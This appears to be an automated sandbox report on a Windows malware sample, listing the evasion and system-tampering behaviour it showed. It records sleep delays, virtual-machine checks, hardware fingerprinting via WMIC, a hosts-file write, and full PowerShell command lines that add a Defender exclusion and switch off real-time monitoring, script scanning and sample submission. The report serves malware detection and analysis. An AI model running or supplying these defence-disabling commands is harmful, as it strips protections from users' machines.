              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeMemory allocated: 1ED08530000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeMemory allocated: 1ED22090000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeWindow / User API: threadDelayed 4826Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeWindow / User API: threadDelayed 4869Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5480Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4274Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2362Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1208Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4149
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3528
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1133
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -99015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -98906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -98796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -98687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe TID: 6332Thread sleep time: -598578s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 5480 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep count: 4274 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep count: 2362 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep count: 1208 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep count: 4149 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep count: 68 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6264Thread sleep count: 3528 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888Thread sleep count: 1133 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99890Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99781Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99671Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99562Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99453Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99343Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99234Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99125Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 99015Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 98906Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 98796Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 98687Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drBinary or memory string: vboxtray
              Source: 4z5ru.scr.0.drBinary or memory string: vboxservice
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drBinary or memory string: qemu-ga
              Source: apDMcnqqWs.exe, 00000000.00000002.2592302123.000001ED08634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
              Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A400000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
              Source: powershell.exe, 00000012.00000002.2531315049.000002CB4C076000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWme
              Source: 4z5ru.scr.0.drBinary or memory string: vmwareuser
              Source: apDMcnqqWs.exe, 4z5ru.scr.0.drBinary or memory string: vmusrvc
              Source: 4z5ru.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
              Source: powershell.exe, 00000012.00000002.2531315049.000002CB4C050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 4z5ru.scr.0.drBinary or memory string: vmsrvc
              Source: 4z5ru.scr.0.drBinary or memory string: vmtoolsd
              Source: 4z5ru.scr.0.drBinary or memory string: vmwaretray
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeQueries volume information: C:\Users\user\Desktop\apDMcnqqWs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\apDMcnqqWs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
